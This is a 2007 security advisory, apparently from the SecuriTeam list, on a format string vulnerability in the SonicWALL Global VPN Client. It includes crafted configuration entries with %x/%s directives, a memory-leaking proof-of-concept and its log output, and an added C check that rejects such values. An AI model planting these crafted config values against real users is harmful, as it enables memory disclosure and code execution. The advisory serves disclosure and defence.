
Tuesday, December 04, 2007

[NT] SonicWALL Global VPN Client Format String Vulnerability

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

SonicWALL Global VPN Client Format String Vulnerability
------------------------------------------------------------------------


SUMMARY

The SonicWALL Global VPN Client "provides mobile users with access to
mission-critical network resources by establishing secure connections to
their office network's IPSec-compliant SonicWALL VPN gateway". SonicWALL
Global VPN Client suffers from a format string vulnerability that can be
triggered by supplying a specially crafted configuration file. This
vulnerability allows an attacker to execute arbitrary code in the context
of the vulnerable client. For a successful attack, the attacker would have
to entice his victim into importing the special configuration file.

DETAILS

Vulnerable Systems:
* SonicWall VPN client versions prior to 4.0.0.830

Immune Systems:
* SonicWall VPN client version 4.0.0.830

Format string errors occur when the client parses the "name" attribute of
the "Connection" tag and the content of the "HostName" tags in the
configuration file.

Examples:
<Connection name=%s%s%s%s>
<HostName>%s%s%s%s</HostName>

The bugs have been verified in version 3.1.556 and beta 4.0.0.810. With
version 3.1.556 the client has to initiate a connection to trigger the
vulnerability, whereas with version 4.0.0.810 the bug can be exploited by
simply double-clicking the configuration file. This can be attributed to
the 4.0 version writing the imported configuration to an extra debug log.

Proof-of-concept:
In 4.0.0.810, the bug can be beautifully demonstrated by supplying a
crafted config file and then viewing the debug logfile. A configuration
like this...

<Connection name=> AAAAAAAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x
<HostName> BBBBBBBBBB%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x

...yields the following logfile:

----------------------< Connection name >-----------------------------------
OnLogMessage(): 'The connection "AAAAAAAAAAe64d20.37327830.46413139.203a3833.782b8d00.6f4c6e4f.73654d67.65676173.203a2928.65685427.6e6f6320.7463656e.206e6f69.41414122.41414141.25414141" has been enabled.' ''
----------------------</Connection name >-----------------------------------
----------------------<HostName>--------------------------------------------
BBBBBBBBBB656d616e.41414120.41414141.25414141.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.74207825.6e61206f.20504920.72646461.2e737365.42272027.42424242.42424242'
----------------------</HostName>---------------------------------------

This vulnerability allows reading / writing to arbitrary memory addresses
within the process memory space. Exploitation is trivial under these
circumstances.
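As an added example (not code from the advisory, SEC Consult or SonicWALL), the following C check flags the two sink fields named above before a configuration is imported, beside the logging form that keeps the imported value out of the format string. It assumes the attribute value directly follows `name=` up to the closing `>`, as in the examples above; the config lines it is tried on are constructed.

```c
/* Added example, not SonicWALL's code: a pre-import check for the two fields
 * the advisory names as format-string sinks (Connection "name", HostName),
 * next to the logging form that keeps such a value out of the format string. */
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Copy the text between `open` and `close` in `line` into `out`.
 * Returns false if either delimiter is missing. */
static bool extract(const char *line, const char *open, const char *close,
                    char *out, size_t outsz)
{
    const char *s = strstr(line, open);
    if (!s) return false;
    s += strlen(open);
    const char *e = strstr(s, close);
    if (!e) return false;
    size_t n = (size_t)(e - s);
    if (n >= outsz) n = outsz - 1;        /* truncate rather than overflow */
    memcpy(out, s, n);
    out[n] = '\0';
    return true;
}

/* Reject any '%': a printf-family sink that takes the value as its format
 * would interpret "%x" (read), "%s" (deref) or "%n" (write) directives. */
static bool value_is_format_safe(const char *v)
{
    return strchr(v, '%') == NULL;
}

/* True if the config line is safe to import. Only the two sink fields are
 * checked; lines carrying neither field pass through unchanged. */
bool config_line_is_safe(const char *line)
{
    char v[512];
    if (extract(line, "<Connection name=", ">", v, sizeof v))
        return value_is_format_safe(v);
    if (extract(line, "<HostName>", "</HostName>", v, sizeof v))
        return value_is_format_safe(v);
    return true;
}

/* Correct logging: the untrusted name is an argument, never the format,
 * so "AAAA%x" is written literally instead of dumping stack words. */
int log_connection_enabled(char *out, size_t outsz, const char *name)
{
    return snprintf(out, outsz, "The connection \"%s\" has been enabled.", name);
}
```

Running the constructed config lines through `config_line_is_safe` rejects the `%x` names from the proof-of-concept and passes ordinary ones; `log_connection_enabled` shows the message the 4.0 debug log should have contained.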

Vendor status:
Vendor notified: 2007-08-16
Vendor response: 2007-08-29
Patch available: 2007-11-26


ADDITIONAL INFORMATION

The information has been provided by Bernhard Mueller
<research@sec-consult.com>.
The original article can be found at:
http://www.sec-consult.com/305.html
